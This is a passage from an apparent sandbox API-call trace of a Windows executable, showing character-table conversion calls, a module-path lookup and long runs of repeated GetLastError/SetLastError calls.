¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0121.874] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0121.880] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0121.880] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fcb8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÂ^]!ôþ\x18", lpUsedDefaultChar=0x0) returned 256 [0121.880] GetLastError () returned 0x7f [0121.880] SetLastError (dwErrCode=0x7f) [0121.880] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0121.880] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x18f708, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0121.880] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0121.880] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4f8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0121.880] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fbb8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÂ^]!ôþ\x18", lpUsedDefaultChar=0x0) returned 256 [0121.881] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x4ad2e0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe")) returned 0x76 [0121.881] GetLastError () returned 0x0 [0121.881] SetLastError (dwErrCode=0x0) [0121.881] GetLastError () returned 0x0 [0121.881] SetLastError (dwErrCode=0x0) [0121.881] GetLastError () returned 0x0 [0121.881] SetLastError (dwErrCode=0x0) [0121.881] GetLastError () returned 0x0 [0121.881] SetLastError (dwErrCode=0x0) [0121.881] GetLastError () returned 0x0 [0121.881] SetLastError (dwErrCode=0x0) [0121.881] GetLastError () returned 0x0 [0121.881] SetLastError (dwErrCode=0x0) [0121.881] GetLastError () returned 0x0 [0121.881] SetLastError (dwErrCode=0x0) [0121.881] GetLastError () returned 0x0 [0121.881] SetLastError (dwErrCode=0x0) [0121.881] GetLastError () returned 0x0 [0121.881] SetLastError (dwErrCode=0x0) [0121.881] GetLastError () returned 0x0 [0121.881] SetLastError (dwErrCode=0x0) [0121.881] GetLastError () returned 0x0 [0121.881] SetLastError (dwErrCode=0x0) [0121.881] GetLastError () returned 0x0 [0121.881] SetLastError (dwErrCode=0x0) [0121.881] GetLastError () returned 0x0 [0121.881] SetLastError (dwErrCode=0x0) [0121.881] GetLastError () returned 0x0 [0121.881] SetLastError (dwErrCode=0x0) [0121.881] GetLastError () returned 0x0 [0121.881] SetLastError (dwErrCode=0x0) [0121.881] GetLastError () returned 0x0 [0121.881] SetLastError (dwErrCode=0x0) [0121.882] GetLastError () returned 0x0 [0121.882] SetLastError (dwErrCode=0x0) [0121.882] GetLastError () returned 0x0 [0121.882] SetLastError (dwErrCode=0x0) [0121.882] GetLastError () returned 0x0 [0121.882] SetLastError (dwErrCode=0x0) [0121.882] GetLastError () returned 0x0 [0121.882] SetLastError (dwErrCode=0x0) [0121.882] GetLastError () returned 0x0 [0121.882] SetLastError (dwErrCode=0x0) [0121.882] GetLastError () returned 0x0 [0121.882] SetLastError (dwErrCode=0x0) [0121.882] GetLastError () returned 0x0 [0121.882] SetLastError (dwErrCode=0x0) [0121.882] GetLastError () returned 0x0 [0121.882] SetLastError (dwErrCode=0x0) [0121.882] GetLastError () returned 0x0 [0121.882] SetLastError (dwErrCode=0x0) [0121.882] GetLastError () returned 0x0 [0121.882] SetLastError (dwErrCode=0x0) [0121.882] GetLastError () returned 0x0 [0121.882] SetLastError (dwErrCode=0x0) [0121.882] GetLastError () returned 0x0 [0121.882] SetLastError (dwErrCode=0x0) [0121.882] GetLastError () returned 0x0 [0121.882] SetLastError (dwErrCode=0x0) [0121.882] GetLastError () returned 0x0 [0121.882] SetLastError (dwErrCode=0x0) [0121.882] GetLastError () returned 0x0 [0121.882] SetLastError (dwErrCode=0x0) [0121.882] GetLastError () returned 0x0 [0121.882] SetLastError (dwErrCode=0x0) [0121.882] GetLastError () returned 0x0 [0121.883] SetLastError (dwErrCode=0x0) [0121.883] GetLastError () returned 0x0 [0121.883] SetLastError (dwErrCode=0x0) [0121.883] GetLastError () returned 0x0 [0121.883] SetLastError (dwErrCode=0x0) [0121.883] GetLastError () returned 0x0 [0121.883] SetLastError (dwErrCode=0x0) [0121.883] GetLastError () returned 0x0 [0121.883] SetLastError (dwErrCode=0x0) [0121.883] GetLastError () returned 0x0 [0121.883] SetLastError (dwErrCode=0x0) [0121.883] GetLastError () returned 0x0 [0121.883] SetLastError (dwErrCode=0x0) [0121.883] GetLastError () returned 0x0 [0121.883] SetLastError (dwErrCode=0x0) [0121.883] GetLastError () returned 0x0 [0121.883] SetLastError (dwErrCode=0x0) [0121.883] GetLastError () returned 0x0 [0121.883] SetLastError (dwErrCode=0x0) [0121.883] GetLastError () returned 0x0 [0121.883] SetLastError (dwErrCode=0x0) [0121.883] GetLastError () returned 0x0 [0121.883] SetLastError (dwErrCode=0x0) [0121.883] GetLastError () returned 0x0 [0121.883] SetLastError (dwErrCode=0x0) [0121.883] GetLastError () returned 0x0 [0121.883] SetLastError (dwErrCode=0x0) [0121.883] GetLastError () returned 0x0 [0121.883] SetLastError (dwErrCode=0x0) [0121.884] GetLastError () returned 0x0 [0121.884] SetLastError (dwErrCode=0x0) [0121.884] GetLastError () returned 0x0 [0121.884] SetLastError (dwErrCode=0x0) [0121.884] GetLastError () returned 0x0 [0121.884] SetLastError (dwErrCode=0x0) [0121.884] GetLastError () returned 0x0 [0121.884] SetLastError (dwErrCode=0x0) [0121.884] GetLastError () returned 0x0 [0121.884] SetLastError (dwErrCode=0x0) [0121.884] GetLastError () returned 0x0 [0121.884] SetLastError (dwErrCode=0x0) [0121.884] GetLastError () returned 0x0 [0121.884] SetLastError (dwErrCode=0x0) [0121.884] GetLastError () returned 0x0 [0121.884] SetLastError (dwErrCode=0x0) [0121.884] GetLastError () returned 0x0 [0121.884] SetLastError (dwErrCode=0x0) [0121.884] GetLastError () returned 0x0 [0121.884] SetLastError (dwErrCode=0x0) [0121.884] GetLastError () returned 0x0 [0121.884] SetLastError (dwErrCode=0x0) [0121.884] GetLastError () returned 0x0 [0121.884] SetLastError (dwErrCode=0x0) [0121.884] GetLastError () returned 0x0 [0121.884] SetLastError (dwErrCode=0x0) [0121.884] GetLastError () returned 0x0 [0121.884] SetLastError (dwErrCode=0x0) [0121.884] GetLastError () returned 0x0 [0121.884] SetLastError (dwErrCode=0x0) [0121.884] GetLastError () returned 0x0 [0121.884] SetLastError (dwErrCode=0x0) [0121.884] GetLastError () returned 0x0 [0121.885] SetLastError (dwErrCode=0x0) [0121.885] GetLastError () returned 0x0 [0121.885] SetLastError (dwErrCode=0x0) [0121.885] GetLastError () returned 0x0 [0121.885] SetLastError (dwErrCode=0x0) [0121.885] GetLastError () returned 0x0 [0121.885] SetLastError (dwErrCode=0x0) [0121.885] GetLastError () returned 0x0 [0121.885] SetLastError (dwErrCode=0x0) [0121.885] GetLastError () returned 0x0 [0121.885] SetLastError (dwErrCode=0x0) [0121.885] GetLastError () returned 0x0 [0121.885] SetLastError (dwErrCode=0x0) [0121.885] GetLastError () returned 0x0 [0121.885] SetLastError (dwErrCode=0x0) [0121.885] GetLastError () returned 0x0 [0121.885] SetLastError (dwErrCode=0x0) [0121.885] GetLastError () returned 0x0 [0121.885] SetLastError (dwErrCode=0x0) [0121.885] GetLastError () returned 0x0 [0121.885] SetLastError (dwErrCode=0x0) [0121.885] GetLastError () returned 0x0 [0121.885] SetLastError (dwErrCode=0x0) [0121.885] GetLastError () returned 0x0 [0121.885] SetLastError (dwErrCode=0x0) [0121.885] GetLastError () returned 0x0 [0121.885] SetLastError (dwErrCode=0x0) [0121.885] GetLastError () returned 0x0 [0121.885] SetLastError (dwErrCode=0x0) [0121.885] GetLastError () returned 0x0 [0121.885] SetLastError (dwErrCode=0x0) [0121.885] GetLastError () returned 0x0 [0121.885] SetLastError (dwErrCode=0x0) [0121.885] GetLastError () returned 0x0 [0121.886] SetLastError (dwErrCode=0x0) [0121.886] GetLastError () returned 0x0 [0121.886] SetLastError (dwErrCode=0x0) [0121.886] GetLastError () returned 0x0 [0121.886] SetLastError (dwErrCode=0x0) [0121.886] GetLastError () returned 0x0 [0121.886] SetLastError (dwErrCode=0x0) [0121.886] GetLastError () returned 0x0 [0121.886] SetLastError (dwErrCode=0x0) [0121.886] GetLastError () returned 0x0 [0121.886] SetLastError (dwErrCode=0x0) [0121.886] GetLastError () returned 0x0 [0121.886] SetLastError (dwErrCode=0x0) [0121.886] GetLastError () returned 0x0 [0121.886] SetLastError (dwErrCode=0x0) [0121.886] GetLastError () returned 0x0 [0121.886] SetLastError (dwErrCode=0x0) [0121.886] GetLastError () returned 0x0 [0121.886] SetLastError (dwErrCode=0x0) [0121.886] GetLastError () returned 0x0 [0121.886] SetLastError (dwErrCode=0x0) [0121.886] GetLastError () returned 0x0 [0121.886] SetLastError (dwErrCode=0x0) [0121.886] GetLastError () returned 0x0 [0121.886] SetLastError (dwErrCode=0x0) [0121.886] GetLastError () returned 0x0 [0121.886] SetLastError (dwErrCode=0x0) [0121.886] GetLastError () returned 0x0 [0121.886] SetLastError (dwErrCode=0x0) [0121.886] GetLastError () returned 0x0 [0121.886] SetLastError (dwErrCode=0x0) [0121.886] GetLastError () returned 0x0 [0121.886] SetLastError (dwErrCode=0x0) [0121.887] GetLastError () returned 0x0 [0121.887] SetLastError (dwErrCode=0x0) [0121.887] GetLastError () returned 0x0 [0121.887] SetLastError (dwErrCode=0x0) [0121.887] GetLastError () returned 0x0 [0121.887] SetLastError (dwErrCode=0x0) [0121.887] GetLastError () returned 0x0 [0121.887] SetLastError (dwErrCode=0x0) [0121.887] GetLastError () returned 0x0 [0121.887] SetLastError (dwErrCode=0x0) [0121.887] GetLastError () returned 0x0 [0121.887] SetLastError (dwErrCode=0x0) [0121.887] GetLastError () returned 0x0 [0121.887] SetLastError (dwErrCode=0x0) [0121.887] GetLastError () returned 0x0 [0121.897] SetLastError (dwErrCode=0x0) [0121.897] GetLastError () returned 0x0 [0121.897] SetLastError (dwErrCode=0x0) [0121.897] GetLastError () returned 0x0 [0121.897] SetLastError (dwErrCode=0x0) [0121.897] GetLastError () returned 0x0 [0121.897] SetLastError (dwErrCode=0x0) [0121.897] GetLastError () returned 0x0 [0121.897] SetLastError (dwErrCode=0x0) [0121.897] GetLastError () returned 0x0 [0121.897] SetLastError (dwErrCode=0x0) [0121.897] GetLastError () returned 0x0 [0121.897] SetLastError (dwErrCode=0x0) [0121.897] GetLastError () returned 0x0 [0121.897] SetLastError (dwErrCode=0x0) [0121.897] GetLastError () returned 0x0 [0121.897] SetLastError (dwErrCode=0x0) [0121.897] GetLastError () returned 0x0 [0121.897] SetLastError (dwErrCode=0x0) [0121.897] GetLastError () returned 0x0 [0121.897] SetLastError (dwErrCode=0x0) [0121.897] GetLastError () returned 0x0 [0121.897] SetLastError (dwErrCode=0x0) [0121.897] GetLastError () returned 0x0 [0121.897] SetLastError (dwErrCode=0x0) [0121.897] GetLastError () returned 0x0 [0121.897] SetLastError (dwErrCode=0x0) [0121.897] GetLastError () returned 0x0 [0121.897] SetLastError (dwErrCode=0x0) [0121.897] GetLastError () returned 0x0 [0121.897] SetLastError (dwErrCode=0x0) [0121.897] GetLastError () returned 0x0 [0121.898] SetLastError (dwErrCode=0x0) [0121.898] GetLastError () returned 0x0 [0121.898] SetLastError (dwErrCode=0x0) [0121.898] GetLastError () returned 0x0 [0121.898] SetLastError (dwErrCode=0x0) [0121.898] GetLastError () returned 0x0 [0121.898] SetLastError (dwErrCode=0x0) [0121.898] GetLastError () returned 0x0 [0121.898] SetLastError (dwErrCode=0x0) [0121.898] GetLastError () returned 0x0 [0121.898] SetLastError (dwErrCode=0x0) [0121.898] GetLastError () returned 0x0 [0121.898] SetLastError (dwErrCode=0x0) [0121.898] GetLastError () returned 0x0 [0121.898] SetLastError (dwErrCode=0x0) [0121.898] GetLastError () returned 0x0 [0121.898] SetLastError (dwErrCode=0x0) [0121.898] GetLastError () returned 0x0 [0121.898] SetLastError (dwErrCode=0x0) [0121.898] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x8f) returned 0x6f3e28 [0121.898] GetLastError () returned 0x0 [0121.898] SetLastError (dwErrCode=0x0) [0121.898] GetLastError () returned 0x0 [0121.898] SetLastError (dwErrCode=0x0) [0121.898] GetLastError () returned 0x0 [0121.898] SetLastError (dwErrCode=0x0) [0121.898] GetLastError () returned 0x0 [0121.898] SetLastError (dwErrCode=0x0) [0121.898] GetLastError () returned 0x0 [0121.898] SetLastError (dwErrCode=0x0) [0121.898] GetLastError () returned 0x0 [0121.898] SetLastError (dwErrCode=0x0) [0121.898] GetLastError () returned 0x0 [0121.898] SetLastError (dwErrCode=0x0) [0121.899] GetLastError () returned 0x0 [0121.899] SetLastError (dwErrCode=0x0) [0121.899] GetLastError () returned 0x0 [0121.899] SetLastError (dwErrCode=0x0) [0121.899] GetLastError () returned 0x0 [0121.899] SetLastError (dwErrCode=0x0) [0121.899] GetLastError () returned 0x0 [0121.899] SetLastError (dwErrCode=0x0) [0121.899] GetLastError () returned 0x0 [0121.899] SetLastError (dwErrCode=0x0) [0121.899] GetLastError () returned 0x0 [0121.899] SetLastError (dwErrCode=0x0) [0121.899] GetLastError () returned 0x0 [0121.899] SetLastError (dwErrCode=0x0) [0121.899] GetLastError () returned 0x0 [0121.899] SetLastError (dwErrCode=0x0) [0121.899] GetLastError () returned 0x0 [0121.899] SetLastError (dwErrCode=0x0) [0121.899] GetLastError () returned 0x0 [0121.899] SetLastError (dwErrCode=0x0) [0121.899] GetLastError () returned 0x0 [0121.899] SetLastError (dwErrCode=0x0) [0121.899] GetLastError () returned 0x0 [0121.899] SetLastError (dwErrCode=0x0) [0121.899] GetLastError () returned 0x0 [0121.899] SetLastError (dwErrCode=0x0) [0121.899] GetLastError () returned 0x0 [0121.899] SetLastError (dwErrCode=0x0) [0121.899] GetLastError () returned 0x0 [0121.899] SetLastError (dwErrCode=0x0) [0121.899] GetLastError () returned 0x0 [0121.899] SetLastError (dwErrCode=0x0) [0121.899] GetLastError () returned 0x0 [0121.900] SetLastError (dwErrCode=0x0) [0121.900] GetLastError () returned 0x0 [0121.900] SetLastError (dwErrCode=0x0) [0121.900] GetLastError () returned 0x0 [0121.900] SetLastError (dwErrCode=0x0) [0121.900] GetLastError () returned 0x0 [0121.900] SetLastError (dwErrCode=0x0) [0121.900] GetLastError () returned 0x0 [0121.900] SetLastError (dwErrCode=0x0) [0121.900] GetLastError () returned 0x0 [0121.900] SetLastError (dwErrCode=0x0) [0121.900] GetLastError () returned 0x0 [0121.900] SetLastError (dwErrCode=0x0) [0121.900] GetLastError () returned 0x0 [0121.900] SetLastError (dwErrCode=0x0) [0121.900] GetLastError () returned 0x0 [0121.900] SetLastError (dwErrCode=0x0) [0121.900] GetLastError () returned 0x0 [0121.900] SetLastError (dwErrCode=0x0) [0121.900] GetLastError () returned 0x0 [0121.900] SetLastError (dwErrCode=0x0) [0121.900] GetLastError () returned 0x0 [0121.900] SetLastError (dwErrCode=0x0) [0121.900] GetLastError () returned 0x0 [0121.900] SetLastError (dwErrCode=0x0) [0121.900] GetLastError () returned 0x0 [0121.900] SetLastError (dwErrCode=0x0) [0121.900] GetLastError () returned 0x0 [0121.900] SetLastError (dwErrCode=0x0) [0121.900] GetLastError () returned 0x0 [0121.900] SetLastError (dwErrCode=0x0) [0121.900] GetLastError () returned 0x0 [0121.900] SetLastError (dwErrCode=0x0) [0121.901] GetLastError () returned 0x0 [0121.901] SetLastError (dwErrCode=0x0) [0121.901] GetLastError () returned 0x0 [0121.901] SetLastError (dwErrCode=0x0) [0121.901] GetLastError () returned 0x0 [0121.901] SetLastError (dwErrCode=0x0) [0121.901] GetLastError () returned 0x0 [0121.901] SetLastError (dwErrCode=0x0) [0121.901] GetLastError () returned 0x0 [0121.901] SetLastError (dwErrCode=0x0) [0121.901] GetLastError () returned 0x0 [0121.901] SetLastError (dwErrCode=0x0) [0121.901] GetLastError () returned 0x0 [0121.901] SetLastError (dwErrCode=0x0) [0121.901] GetLastError () returned 0x0 [0121.901] SetLastError (dwErrCode=0x0) [0121.901] GetLastError () returned 0x0 [0121.901] SetLastError (dwErrCode=0x0) [0121.901] GetLastError () returned 0x0 [0121.901] SetLastError (dwErrCode=0x0) [0121.901] GetLastError () returned 0x0 [0121.901] SetLastError (dwErrCode=0x0) [0121.901] GetLastError () returned 0x0 [0121.901] SetLastError (dwErrCode=0x0) [0121.901] GetLastError () returned 0x0 [0121.901] SetLastError 